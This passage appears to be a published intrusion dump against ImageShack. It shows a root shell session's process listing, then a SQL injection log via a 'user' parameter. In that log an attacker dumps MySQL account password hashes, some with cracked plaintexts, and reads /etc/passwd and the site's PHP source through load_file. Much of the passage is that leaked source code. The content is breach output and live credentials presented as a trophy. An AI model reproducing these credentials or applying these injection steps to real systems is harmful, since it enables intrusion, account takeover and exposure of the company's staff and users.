cal/bin/multi-php /data/imageshack/packages/file-deletion/bin/MultiThreadDel
etion.php
image 8860 0.8 0.1 208268 15524 ? S 14:45 0:02 \_ /usr/lo
cal/bin/multi-php /data/imageshack/packages/file-deletion/bin/MultiThreadDel
etion.php
image 9239 0.7 0.1 205452 13200 ? S 14:45 0:02 \_ /usr/lo
cal/bin/multi-php /data/imageshack/packages/file-deletion/bin/MultiThreadDel
etion.php
image 9501 0.8 0.1 207756 15272 ? S 14:45 0:02 \_ /usr/lo
cal/bin/multi-php /data/imageshack/packages/file-deletion/bin/MultiThreadDel
etion.php
image 9983 0.5 0.3 219532 24864 ? S 14:46 0:01 \_ /usr/lo
cal/bin/multi-php /data/imageshack/packages/file-deletion/bin/MultiThreadDel
etion.php
image 9984 0.5 0.3 220044 25512 ? S 14:46 0:01 \_ /usr/lo
cal/bin/multi-php /data/imageshack/packages/file-deletion/bin/MultiThreadDel
etion.php
image 10157 0.7 0.1 205196 12844 ? S 14:46 0:01 \_ /usr/lo
cal/bin/multi-php /data/imageshack/packages/file-deletion/bin/MultiThreadDel
etion.php
image 10491 1.1 0.2 210572 18156 ? S 14:46 0:02 \_ /usr/lo
cal/bin/multi-php /data/imageshack/packages/file-deletion/bin/MultiThreadDel
etion.php
image 11992 1.0 0.1 205708 13452 ? S 14:47 0:01 \_ /usr/lo
cal/bin/multi-php /data/imageshack/packages/file-deletion/bin/MultiThreadDel
etion.php
image 12262 0.9 0.1 204172 11932 ? S 14:47 0:01 \_ /usr/lo
cal/bin/multi-php /data/imageshack/packages/file-deletion/bin/MultiThreadDel
etion.php
image 12351 1.0 0.1 205452 12600 ? S 14:47 0:01 \_ /usr/lo
cal/bin/multi-php /data/imageshack/packages/file-deletion/bin/MultiThreadDel
etion.php
image 12352 1.0 0.1 205708 13112 ? S 14:47 0:01 \_ /usr/lo
cal/bin/multi-php /data/imageshack/packages/file-deletion/bin/MultiThreadDel
etion.php
image 13561 0.9 0.1 205452 12680 ? S 14:48 0:01 \_ /usr/lo
cal/bin/multi-php /data/imageshack/packages/file-deletion/bin/MultiThreadDel
etion.php
image 13925 0.6 0.1 203148 10620 ? S 14:48 0:00 \_ /usr/lo
cal/bin/multi-php /data/imageshack/packages/file-deletion/bin/MultiThreadDel
etion.php
image 13926 0.1 0.0 199820 7528 ? S 14:48 0:00 \_ /usr/lo
cal/bin/multi-php /data/imageshack/packages/file-deletion/bin/MultiThreadDel
etion.php
image 13978 0.8 0.1 201612 9276 ? S 14:48 0:00 \_ /usr/lo
cal/bin/multi-php /data/imageshack/packages/file-deletion/bin/MultiThreadDel
etion.php
image 13980 0.9 0.1 205452 13204 ? S 14:48 0:01 \_ /usr/lo
cal/bin/multi-php /data/imageshack/packages/file-deletion/bin/MultiThreadDel
etion.php
image 14156 0.4 0.0 199820 7572 ? S 14:48 0:00 \_ /usr/lo
cal/bin/multi-php /data/imageshack/packages/file-deletion/bin/MultiThreadDel
etion.php
image 14547 0.0 0.0 199820 7528 ? S 14:48 0:00 \_ /usr/lo
cal/bin/multi-php /data/imageshack/packages/file-deletion/bin/MultiThreadDel
etion.php
image 14974 0.0 0.0 199820 7524 ? S 14:49 0:00 \_ /usr/lo
cal/bin/multi-php /data/imageshack/packages/file-deletion/bin/MultiThreadDel
etion.php
image 15233 0.0 0.0 199820 7524 ? S 14:49 0:00 \_ /usr/lo
cal/bin/multi-php /data/imageshack/packages/file-deletion/bin/MultiThreadDel
etion.php
image 15555 0.0 0.0 199820 7524 ? S 14:49 0:00 \_ /usr/lo
cal/bin/multi-php /data/imageshack/packages/file-deletion/bin/MultiThreadDel
etion.php
image 16543 0.0 0.0 199820 7500 ? S 14:50 0:00 \_ /usr/lo
cal/bin/multi-php /data/imageshack/packages/file-deletion/bin/MultiThreadDel
etion.php
image 16790 0.7 0.0 199820 7520 ? S 14:50 0:00 \_ /usr/lo
cal/bin/multi-php /data/imageshack/packages/file-deletion/bin/MultiThreadDel
etion.php
image 16826 0.0 0.0 199820 7488 ? S 14:50 0:00 \_ /usr/lo
cal/bin/multi-php /data/imageshack/packages/file-deletion/bin/MultiThreadDel
etion.php
image 16827 0.0 0.0 199820 7440 ? S 14:50 0:00 \_ /usr/lo
cal/bin/multi-php /data/imageshack/packages/file-deletion/bin/MultiThreadDel
etion.php
image 6206 0.1 0.0 169244 7208 ? S Aug06 39:03 python /usr
/local/sbin/rolesd
root 6245 0.0 0.0 96284 1220 ? Ss Aug06 1:17 crond
root 16385 0.0 0.0 123448 1648 ? S 14:50 0:00 \_ CROND
root 16388 0.0 0.0 8948 1168 ? Ss 14:50 0:00 \_ /bi
n/bash /root/bin/mysql_logger.sh
root 16951 0.0 0.0 8180 600 ? S 14:50 0:00 \_
sleep 10
root 24892 0.0 0.0 3920 552 tty1 Ss+ Aug15 0:00 /sbin/minge
tty tty1
root 3960 0.0 0.0 3932 124 ? S Aug22 0:00 -sh
root 3961 0.0 0.0 3932 320 ? S Aug22 0:00 \_ -sh
root 16957 0.0 0.0 3936 244 ? S 14:50 0:00 \_ -sh
root 16959 0.0 0.0 11176 1080 ? R 14:50 0:00
\_ ps auxwwf
# df -h
Filesystem Size Used Avail Use% Mounted on
/dev/sda1 1.8T 510G 1.3T 29% /
tmpfs 4.0G 4.0G 0 100% /dev/shm
/dev/sdb1 1.8T 361G 1.5T 20% /disk2
# exit
logout
Connection to stream.imageshack.us closed.
Priority 3: MySQL databases
[#] HTP
[*] Identifying vector :: http://imageshack.us/homepage/index.php?user=demo
[$] Parameter acquired :: user
[*] Technique :: UNION (9 columns)
[*] DBMS version :: MySQL 5.1.61-log
[*] Database servers :: img727.imageshack.us, img976.imageshack.us
[$] Dropping into shell
> SELECT user();
root@localhost
> SELECT database();
image_tracking
> SELECT host, user, password FROM mysql.user;
localhost, root, *97BFB9A52F48066BC33467A9B7650986A23E6F07 < mutaborius
localhost.localdomain, root, *97BFB9A52F48066BC33467A9B7650986A23E6F07
localhost.localdomain, ,
localhost, ,
localhost, homepage, 6addcc5d231bb91f
%, homepage, 6addcc5d231bb91f
localhost, prefs, 007749620909a231
%, prefs, 007749620909a231
localhost, readonly, 3526a78437e305e7
%, readonly, 3526a78437e305e7
localhost, nreadonly, 3526a78437e305e7
%, nreadonly, 3526a78437e305e7
localhost, disotheb, *B17462765093C711B4E12E06791051966FCB7DAB
38.99.76.244, tf, *C17F2E46B3683AC9A44E5A959C5D304C960CCD8C < tf
38.99.77.72, tf, *C17F2E46B3683AC9A44E5A959C5D304C960CCD8C
38.99.76.246, tf, *C17F2E46B3683AC9A44E5A959C5D304C960CCD8C
38.99.77.74, replcheck, *99DCEE8178FAA08F8F424D461569753F7188E524
localhost, tor, *57F5B0B2F9E77F8A8452D674FD9BF962DB69274D < tor
img719.imageshack.us, redroach, *D6C35EF555F98715B643D033EF19DAFE5108096B
^ iabmeclttc
localhost, replcheck, *99DCEE8178FAA08F8F424D461569753F7188E524
mpmon1.imageshack.us, cactiuser, *B2D75382FC1C6634276C6E43FCAA0E2CCE2359F0
%, repl, *7190EACD1E3619F188B2741BC8DE997C0A90A528
10.10%, yf2dbuser, *55088A2B00878E41D5ED1101583CCC9CDB187C2F
localhost, yf2dbuser, *55088A2B00878E41D5ED1101583CCC9CDB187C2F
localhost, yf2dbuser, *55088A2B00878E41D5ED1101583CCC9CDB187C2F
%, javauser, *6172E195ECEBA6BD94AC1FAFB7DC4AD2FC404AE3
localhost, javauser,
> SELECT load_file('/etc/passwd');
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
image:x:500:1000::/home/image:/bin/bash
gmond:x:516:516:Ganglia Monitor Daemon:/var/lib/ganglia:/sbin/nologin
build:x:715:715::/home/build:/bin/bash
jack:x:520:100::/home/jack:/bin/bash
macbeth:x:503:100::/home/macbeth:/bin/bash
lord:x:504:100::/home/lord:/bin/tcsh
disotheb:x:506:100::/home/disotheb:/bin/bash
npettas:x:512:100::/home/npettas:/bin/bash
chris:x:521:100::/home/chris:/bin/bash
leo:x:711:100::/home/leo:/bin/bash
edwin:x:522:100::/home/edwin:/bin/bash
msmirnov:x:714:100::/home/msmirnov:/bin/bash
moe:x:725:100::/home/moe:/bin/bash
chrmaury:x:728:100::/home/chrmaury:/bin/bash
wes:x:729:100::/home/wes:/bin/bash
tyler:x:731:100::/home/tyler:/bin/bash
allan:x:745:100::/home/allan:/bin/bash
serge:x:746:100::/home/serge:/bin/bash
nagesh:x:747:100::/home/nagesh:/bin/bash
josiah:x:748:100::/home/josiah:/bin/bash
david:x:749:100::/home/david:/bin/bash
oleg:x:750:100::/home/oleg:/bin/bash
ganglia:x:499:498:Ganglia Monitoring System:/var/lib/ganglia:/sbin/nologin
saslauth:x:498:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
apache:x:497:497:Nginx user:/var/lib/nginx:/bin/false
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
> SELECT load_file('/etc/issue');
CentOS release 6.2 (Final)
Kernel \r on an \m
> SELECT load_file("/home/image/www/homepage/index.php");
<?php
require_once("config.inc");
require_once("dbclient.inc");
require_once("utils.inc");
require_once("../lib/utils/imgcache.inc");
strip_magic_quotes();
$user = strtolower(param("user"));
if (empty($user))
die('Missing user parameter');
if( is_deleted_account($user) )
{
header('location: http://imageshack.us');
exit;
}
set_headers();
header('Cache-Control: no-cache,no-store,must-revalidate,max-age=0');
header('Pragma: no-cache');
header('Expires: Mon, 1 Jan 2001 00:00:00 GMT');
$errors = array();
include_once("processcomment.inc");
$tagname = param('tagname');
$tag_id = -1;
$ipage = param('ipage', 1);
// first image to retrieve
$istart = ($ipage - 1) * IMAGE_ROWS_PER_PAGE * IMAGE_COLS_PER_PAGE;
// number of images to retrieve from database
$ilimit = IMAGE_ROWS_PER_PAGE * IMAGE_COLS_PER_PAGE * IMAGE_CACHED_PAGES;
$spage = param('spage', 1);
// first slideshow to retrieve
$sstart = ($spage - 1) * SHOW_ROWS_PER_PAGE * SHOW_COLS_PER_PAGE;
// number of shows to retrieve from database
$slimit = SHOW_ROWS_PER_PAGE * SHOW_COLS_PER_PAGE * SHOW_CACHED_PAGES;
$vpage = param('vpage', 1);
// first video to retrieve
$vstart = ($vpage - 1) * VIDEO_ROWS_PER_PAGE * VIDEO_COLS_PER_PAGE;
// number of videos to retrieve from database
$vlimit = VIDEO_ROWS_PER_PAGE * VIDEO_COLS_PER_PAGE * VIDEO_CACHED_PAGES;
// current tag page
$tpage = param('p', 0);
$tstart = $tpage * TAGS_PER_PAGE;
$tlimit = TAGS_PER_PAGE * TAGS_PAGES;
// first comment to retrieve
$mpage = param('mpage', 1);
$mstart = ($mpage - 1) * COMMENTS_ROWS_PER_PAGE * COMMENTS_COLS_PER_PAGE;
// number of comments to retrieve from database
$mlimit = COMMENTS_ROWS_PER_PAGE * COMMENTS_COLS_PER_PAGE * COMMENTS_CACH
ED_PAGES;
$user_id = 0;
$now = getdate();
$to_m = $now['mon'];
$to_y = $now['year'];
$from_m = $now['mon'];
$from_y = $now['year'];
$from_m -= 3;
if ($from_m < 1)
{
$from_m = 1;
$from_y--;
}
$full_data = get_data($user_id, $user, true,
// fetch user
$tag_id, $tagname, true,
// fetch current tag
$tstart, $tlimit, false, true,
// fetch tags
$istart, $ilimit, true,
// fetch images
$sstart, $slimit, true,
// fetch slideshows
$vstart, $vlimit, true,
// fetch videos
false,
// fetch related (configurable)
true,
// fetch friends
$mstart, $mlimit, true,
// fetch comments
0, 0, 0, 0, 0, 0,
// do not use date restrictions
$from_y, $from_m, $to_y, $to_m);
// fetch calendar
if (empty($full_data))
{
header('location: http://imageshack.us');
exit;
}
$info = $full_data['account'];
$user_id = $info['id'];
$tag_id = $full_data['currenttag'];
$show_prefs = !empty($my_cookie) && $info['cookie'] == $my_cookie;
$show_friends = true;
?>
<!DOCTYPE html PUBLIC
"-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>ImageShack® - <?= htmlentities($user) ?>'s Profile Page</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="Author" content="ImageShack® Corp" />
<meta name="Keywords" content="ImageShack®, Image Shack, image hosting
, free image hosting, image upload, free image upload, uploading, hosting,
upload images, free upload, free hosting, image, images, picture, pictures,
picture upload, picture hosting, free picture upload" />
<meta name="Description" content="ImageShack® Corp - www.ImageShack.us
: ImageShack uses a highly reliable dedicated Linux server network to prov
ide its digital content hosting service!" />
<meta name="Copyright" content="© 2003-2005 ImageShack Corp" />
<meta name="Language" content="en" />
<link rel="openid.server" href="http://profile.imageshack.us/openid/" />
<link rel="openid.delegate" href="<?= homepage_url($user) ?>"/>
<link href="/css/styles.css" rel="stylesheet" type="text/css"/>
<link rel="stylesheet" title="User Defined Style" href="/img/tooltips.css"
type="text/css" />
<link rel="stylesheet" title="User Defined Style" href="/img/calendar.css"
type="text/css" />
<link rel="stylesheet" type="text/css" href="/css/blue_round.css"/>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<?php
print "<link rel=\"alternate\" title=\"RSS\" href=\"" . rss_url($user)
. "\" type=\"application/rss+xml\"/>\n";
?>
<script type="text/javascript" src="/scripts/common/urls.js?v1"></script>
<script type="text/javascript" src="/scripts/common/common.js?v1"></script>
<script type="text/javascript" src="/homepage/homepage.js"></script>
<script type="text/javascript" src="/scripts/yui/YAHOO.js"></script>
<script type="text/javascript" src="/scripts/yui/connection.js"></script>
<script type="text/javascript" src="/scripts/calendar/calendar.js"></script
>
<script type="text/javascript" src="/homepage/hpdatefunc.js"></script>
<script type="text/javascript" src="/scripts/tooltips/fxtooltips.js"></scri
pt>
<script type="text/javascript" src="/homepage/comments_form.js"></script>
<script type="text/javascript">
var USE_IMAGE_CACHE = false;
function ol()
{
initialize_tags('c');
initialize_images('i');
initialize_shows('s');
initialize_videos('v');
<?php
if (PROFILE_COMMENTS_ENABLED)
echo "initialize_comments('m');";
?>
<?php
if (!empty($tagname) && $tag_id != -1)
echo "show_tag('" . jsencode($tagname) . "');";
?>
tags_go_page(<?= $tpage ?>);
images_go_page(<?= $ipage ?>);
slideshows_go_page(<?= $spage ?>);
videos_go_page(<?= $vpage ?>);
<?php
if (PROFILE_COMMENTS_ENABLED)
{
echo "comments_go_page(1);";
echo "show_comments_form();";
}
?>
show_calendar();
}
</script>
</head>
<!-- <?php pageinfo(); ?> -->
<body style="margin:0px;" onload="ol()" onpageshow="if (event.persisted) ol
();">
<div id="mist" class="mist"></div>
<div id="dhtmltooltip"></div>
<div id="iloader" style="display:none"></div>
<div id="sloader" style="display:none"></div>
<div id="vloader" style="display:none"></div>
<div id="mloader" style="display:none"></div>
<div>
<input id="id" name="id" type="hidden" value="<?= $user_id ?>"/>
<input id="user" name="user" type="hidden" value="<?= $user ?>"/>
<input id="order" name="order" type="hidden" value="c"/>
<input id="tagid" name="tagid" type="hidden" value="-1"/>
<input id="tagname" name="tagname" type="hidden" value="<?= $tagname ?>"/>
<input id="ifiltered" name="ifiltered" type="hidden" value="<?= $tag_id !=
-1 ? 'true' : 'false' ?>"/>
<input id="sfiltered" name="sfiltered" type="hidden" value="<?= $tag_id !=
-1 ? 'true' : 'false' ?>"/>
<input id="vfiltered" name="vfiltered" type="hidden" value="<?= $tag_id !=
-1 ? 'true' : 'false' ?>"/>
<input id="mfiltered" name="vfiltered" type="hidden" value="false"/>
<?php dump_hosts() ?>
<input id="irows" name="irows" type="hidden" value="<?= IMAGE_ROWS_PER_PAGE
?>"/>
<input id="icols" name="icols" type="hidden" value="<?= IMAGE_COLS_PER_PAGE
?>"/>
<input id="srows" name="srows" type="hidden" value="<?= SHOW_ROWS_PER_PAGE
?>"/>
<input id="scols" name="scols" type="hidden" value="<?= SHOW_COLS_PER_PAGE
?>"/>
<input id="vrows" name="srows" type="hidden" value="<?= VIDEO_ROWS_PER_PAGE
?>"/>
<input id="vcols" name="scols" type="hidden" value="<?= VIDEO_COLS_PER_PAGE
?>"/>
<input id="mrows" name="mrows" type="hidden" value="<?= COMMENTS_ROWS_PER_P
AGE ?>"/>
<input id="mcols" name="mcols" type="hidden" value="<?= COMMENTS_COLS_PER_P
AGE ?>"/>
<input id="trows" name="trows" type="hidden" value="<?= TAGS_PER_PAGE ?>"/>
</div>
<?php
require_once('../lib/common/issmarty.inc');
$smarty = &new issmarty();
$smarty->assign('my_cookie', $my_cookie);
$smarty->display('is:common/header_tools.tpl');
?>
<table width="990px" border="0" cellpadding="0" cellspacing="0" align="cent
er">
<!-- content -->
<tr>
<td colspan="2" valign="top">
<table width="990px" border="0" cellpadding="0" cellspacing
="0">
<tr>
<td><img src="<?= iurl('1pix.gif') ?>" width="8" he
ight="1" alt=""/></td>
<td style="width:728px;vertical-align:top;"><!--cen
ter start-->
<table border="0" cellpadding="0" cells
pacing="0" style="vertical-align:top;" align="center">
<tr>
<td style="height:20px;vertical
-align:top;">
<span class="zag2"><?= $use
r ?> (member since <?= date('Y-m-d', $info['creation_date'])?>)</span><br/>
</td>
</tr>
<tr>
<td>
<table border="0" cellpaddi
ng="0" cellspacing="0">
<tr>
<!-- userpic -->
<td rowspan="2" val
ign="top" align="left" style="width:87px;height:93px;background-repeat:no-r
epeat;">
<div id="userpi
cture" style="position:relative;width:75px;height:75px;">
<?php
if (!empty($
info['server']) && !empty($info['filename']))
{
$image_
id = make_image_url($info['server'], $info['filename'], $info['have_thumb']
);
echo "<
img width=\"1\" height=\"1\" src=\"" . $image_id . "\" onload=\"uok(this,1)
\" onerror=\"uerror(this,1)\" alt=\"" . $user. "\" title=\"" . $user . "\"/
>";
}
else
{
echo "<
img img width=\"1\" height=\"1\" src=\"" . iurl('no_photo.gif') . "\" onloa
d=\"uok(this,1)\" onerror=\"uerror(this,1)\" alt=\"" . $user. "\" title=\""
. $user . "\"/>";
}
?>
</div>
</td>
<!-- user descripti
on -->
<td style="vertical
-align:top;text-align:left;width:400px;height:80px;">
<div style="wid
th:400px;height:80px;padding-left:3px;padding-right:3px;overflow:auto;">
<?= htmlentitie
s($info['description']) ?>
</div>
</td>
</tr>
<tr>
<!-- leave a messag
e and friendship -->
<td valign="top" st
yle="height:41px;padding-top:5px;">
<table border="
0" cellpadding="0" cellspacing="0">
<tr>
<td sty
le="padding-left:20px;">
<di
v id="fstatus"></div>
<sc
ript type="text/javascript">
<!-
-
function show_friendship(rsp)
{
get('fstatus').innerHTML = rsp.responseText;
}
var callback_url = '/homepage/friendship.php?user=<?= $user ?>&rand=' + Ma
th.random();
callback =
{
success: show_friendship,
argument: null
};
YAHOO.util.Connect.asyncRequest('GET', callback_url, callback, null, null)
;
//-
->
</s
cript>
</td>
</tr>
</table>
</td>
</tr>
</table>
</td>
</tr>
<!-- homepage URL -->
<tr>
<td>
<table border="0" cellpaddi
ng="0" cellspacing="0">
<tr>
<td>
<img src="<?= i
url('pic_83.gif') ?>" width="31" height="32" alt=""/>
</td>
<td class="zag3"><?
= $user ?>'s pages</td>
</tr>
<tr>
<td> </td>
<td style="padding-
left: 5px;">
<table border="
0">
<tr>
<td wid
th="32" height="16">
<a
href="http://www.imageshack.us" target="_new" title="ImageShack"><img src=
"<?= iurl('imageshack.gif') ?>" width="16" height="16" border="0" alt="Ima
geShack" title="ImageShack"/></a>
</td>
<td>
<in
put readonly="readonly" style="width:300px;" type="text" onclick="highlight
(this)" value="<?= homepage_url($user)?>"/>
</td>
</tr>
<?php
include("..
/lib/utils/otherblogs.inc");
foreach ($f
ull_data['otherblogs'] as $blog)
{
if (!em
pty($blog['url']))
ech
o blog_link($blog['type'], $blog['url'], "/images/");
}
?>
</table>
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td valign="top">
<table border="0" cellpaddi
ng="0" cellspacing="0">
<tr>
<td valign="top" st
yle="padding-top:5px;">....................................................
.........................................................................</
td>
<td><img src="<?= i
url('pic_20.gif') ?>" width="28" height="28" alt=""/></td>
</tr>
</table>
</td>
</tr>
<tr>
<td>
<table border="0" cellpaddi
ng="0" cellspacing="0">
<tr>
<td>
<img src="<?= i
url('pic_83.gif') ?>" width="31" height="32" alt=""/>
</td>
<td class="zag3">My
images</td>
<td class="bb" sty
le="display:none;padding-left:20px;" id="ttpi">(</td>
<td class="bb" sty
le="display:none;padding-left:0px;" id="ttni">
</td>
<td class="bb" sty
le="display:none;" id="ttri">
<a href="javasc
ript:void(0)" onclick="javascript:clear_filter();return false;"><img src="<
?= iurl('remove.gif') ?>" width="22" height="22" title="Clear" alt="Clear"/
></a>
</td>
<td class="bb" sty
le="display:none;padding-left:0px;" id="ttsdi">
</td>
<td class="bb" sty
le="display:none;" id="ttcdi">
<a href="javasc
ript:void(0)" onclick="javascript:clear_filter();return false;"><img src="<
?= iurl('remove.gif') ?>" width="22" height="22" title="Clear" alt="Clear"/
></a>
</td>
<td class="bb" sty
le="display:none;padding-left:0px;" id="ttsi">)</td>
</tr>
</table>
</td>
</tr>
<!-- images -->
<tr>
<td>
<div id="imageinfo_content"
>
<div id="inav" style="p
adding-left: 37px;">
<div id="inavinfo"
style="padding-bottom:10px;"></div>
<div id="inavbar"
style="padding-top:2px;padding-bottom:10px;"></div>
</div>
<div id="ihascontent">
<table border="0">
<?php
for ($i = 0; $i
< IMAGE_ROWS_PER_PAGE; $i++)
{
echo "<tr>\
n";
for ($j = 0
; $j < IMAGE_COLS_PER_PAGE; $j++)
{
echo "<
td align=\"left\" valign=\"top\" style=\"background-repeat:no-repeat;width:
87px; height: 93px;\">\n";
$id = $
i * IMAGE_COLS_PER_PAGE + $j;
echo "<
div id=\"ih_" . $id . "\" style=\"position: relative; width: 75px; height:
75px;\"></div>\n";
echo "<
/td>";
}
echo "</tr>
\n";
}
?>
</table>
<div id="imore" sty
le="display:none;padding-top:7px;">
<table border="
0">
<tr>
<td>
<a
title="RSS feed" href="http://rss.imageshack.us/user/<?= $user ?>/rss/"><im
g alt="RSS feed" title="RSS feed" src="<?= iurl('feed-icon-14x14.gif') ?>"/
></a>
</td>
<td sty
le="padding-left:28px;" id="imorelink">
<a
class="ser" href="<?= publicimages_url($user) ?>">[more...]</a>
</td>
</tr>
</table>
</div>
<div id="imoretagge
d1" style="display:none;padding-top:7px;">
</div>
</div>
<div id="inocontent" st
yle="display: none;">
<br/><span class="n
m">no matching images found</span>
<div id="imoretagge
d2" style="display:none;padding-top:7px;"></div>
</div>
<div id="icontentdata"
style="display: none;">
<?php
include("images.php
");
?>
</div>
<div id="imageinfo_cont
ent_loading" style="display: none;"><img src="<?= iurl('loading.gif') ?>" a
lt="Loading" title="Loading" width="56" height="16"/></div>
</div>
</td>
</tr>
<!-- separator -->
<tr>
<td valign="top">
<table border="0" cellpaddi
ng="0" cellspacing="0">
<tr>
<td valign="top" st
yle="padding-top:5px;">....................................................
.........................................................................</
td>
<td>
<img src="<?= i
url('pic_20.gif') ?>" width="28" height="28" alt=""/>
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td>
<table border="0" cellpaddi
ng="0" cellspacing="0">
<tr>
<td>
<img src="<?= i
url('pic_83.gif') ?>" width="31" height="32" alt=""/>
</td>
<td class="zag3">My
slideshows</td>
<td class="bb" sty
le="display:none;padding-left:20px;" id="ttps">(</td>
<td class="bb" sty
le="display:none;padding-left:0px;" id="ttns">
</td>
<td class="bb" sty
le="display:none;" id="ttrs">
<a href="javasc
ript:void(0)" onclick="javascript:clear_filter();return false;"><img src="<
?= iurl('remove.gif') ?>" width="22" height="22" title="Clear" alt="Clear"/
></a>
</td>
<td class="bb" sty
le="display:none;padding-left:0px;" id="ttsds">
</td>
<td class="bb" sty
le="display:none;" id="ttcds">
<a href="javasc
ript:void(0)" onclick="javascript:clear_filter();return false;"><img src="<
?= iurl('remove.gif') ?>" width="22" height="22" title="Clear" alt="Clear"/
></a>
</td>
<td class="bb" sty
le="display:none;padding-left:0px;" id="ttss">)</td>
</tr>
</table>
</td>
</tr>
<!-- slideshows -->
<tr>
<td>
<div id="slideshowinfo_cont
ent">
<div id="snav" style="p
adding-left: 37px;">
<div id="snavinfo"
style="padding-bottom:10px;"></div>
<div id="snavbar"
style="padding-top:2px;padding-bottom:10px;"></div>
</div>
<div id="shascontent">
<table border="0">
<?php
for ($i = 0; $i
< SHOW_ROWS_PER_PAGE; $i++)
{
echo "<tr>\
n";
for ($j = 0
; $j < SHOW_COLS_PER_PAGE; $j++)
{
echo "<
td align=\"left\" valign=\"top\" style=\"background-repeat:no-repeat;width:
87px; height: 93px;\">";
$id = $
i * SHOW_COLS_PER_PAGE + $j;
echo "<
div id=\"sh_" . $id . "\" style=\"position: relative; width: 75px; height:
75px;\"></div>\n";
echo "<
/td>";
}
echo "</tr>
\n";
}
?>
</table>
<div id="smore" sty
le="display: none;padding-top:7px;">
<table border="
0">
<tr>
<td>
<a
title="RSS feed" href="http://rss.imageshack.us/user/<?= $user ?>/rss/"><im
g alt="RSS feed" title="RSS feed" src="<?= iurl('feed-icon-14x14.gif') ?>"/
></a>
</td>
<td sty
le="padding-left:28px;" id="smorelink">
<a
class="ser" href="<?= publicshows_url($user) ?>">[more...]</a>
</td>
</tr>
</table>
</div>
</div>
<div id="snocontent" st
yle="display: none;">
<br/><span class="n
m">no matching slideshows found</span>
</div>
<div id="scontentdata"
style="display: none;">
<?php
include("slideshows
.php");
?>
</div>
<div id="slideshowinfo_
content_loading" style="display: none;"><img src="<?= iurl('loading.gif') ?
>" alt="Loading" title="Loading" width="56" height="16"/></div>
</div>
</td>
</tr>
<!-- separator -->
<tr>
<td valign="top">
<table border="0" cellpaddi
ng="0" cellspacing="0">
<tr>
<td valign="top" st
yle="padding-top:5px;">....................................................
.........................................................................</
td>
<td>
<img src="<?= i
url('pic_20.gif') ?>" width="28" height="28" alt=""/>
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td>
<table border="0" cellpaddi
ng="0" cellspacing="0">
<tr>
<td>
<img src="<?= i
url('pic_83.gif') ?>" width="31" height="32" alt=""/>
</td>
<td class="zag3">My
videos</td>
<td class="bb" sty
le="display:none;padding-left:20px;" id="ttpv">(</td>
<td class="bb" sty
le="display:none;padding-left:0px;" id="ttnv">
</td>
<td class="bb" sty
le="display:none;" id="ttrv">
<a href="javasc
ript:void(0)" onclick="javascript:clear_filter();return false;"><img src="<
?= iurl('remove.gif') ?>" width="22" height="22" title="Clear" alt="Clear"/
></a>
</td>
<td class="bb" sty
le="display:none;padding-left:0px;" id="ttsdv">
</td>
<td class="bb" sty
le="display:none;" id="ttcdv">
<a href="javasc
ript:void(0)" onclick="javascript:clear_filter();return false;"><img src="<
?= iurl('remove.gif') ?>" width="22" height="22" title="Clear" alt="Clear"/
></a>
</td>
<td class="bb" sty
le="display:none;padding-left:0px;" id="ttsv">)</td>
</tr>
</table>
</td>
</tr>
<!-- videos -->
<tr>
<td>
<div id="videoinfo_content"
>
<div id="vnav" style="p
adding-left: 37px;">
<div id="vnavinfo"
style="padding-bottom:10px;"></div>
<div id="vnavbar"
style="padding-top:2px;padding-bottom:10px;"></div>
</div>
<div id="vhascontent">
<table border="0">
<?php
for ($i = 0; $i
< VIDEO_ROWS_PER_PAGE; $i++)
{
echo "<tr>\
n";
for ($j = 0
; $j < VIDEO_COLS_PER_PAGE; $j++)
{
echo "<
td align=\"left\" valign=\"top\" style=\"background-repeat:no-repeat;width:
87px; height: 93px;\">";
$id = $
i * VIDEO_COLS_PER_PAGE + $j;
echo "<
div id=\"vh_" . $id . "\" style=\"position: relative; width: 75px; height:
75px;\"></div>\n";
echo "<
/td>";
}
echo "</tr>
\n";
}
?>
</table>
<div id="vmore" sty
le="display: none;padding-top:7px;">
<table border="
0">
<tr>
<td>
<a
title="RSS feed" href="http://rss.imageshack.us/user/<?= $user ?>/rss/"><im
g alt="RSS feed" title="RSS feed" src="<?= iurl('feed-icon-14x14.gif') ?>"/
></a>
</td>
<td sty
le="padding-left:28px;" id="vmorelink">
<a
class="ser" href="<?= publicvideos_url($user) ?>">[more...]</a>
</td>
</tr>
</table>
</div>
</div>
<div id="vnocontent" st
yle="display: none;">
<br/><span class="n
m">no matching videos found</span>
</div>
<div id="vcontentdata"
style="display: none;">
<?php
include("videos.php
");
?>
</div>
<div id="videoinfo_cont
ent_loading" style="display: none;"><img src="<?= iurl('loading.gif') ?>" a
lt="Loading" title="Loading" width="56" height="16"/></div>
</div>
</td>
</tr>
<!-- separator -->
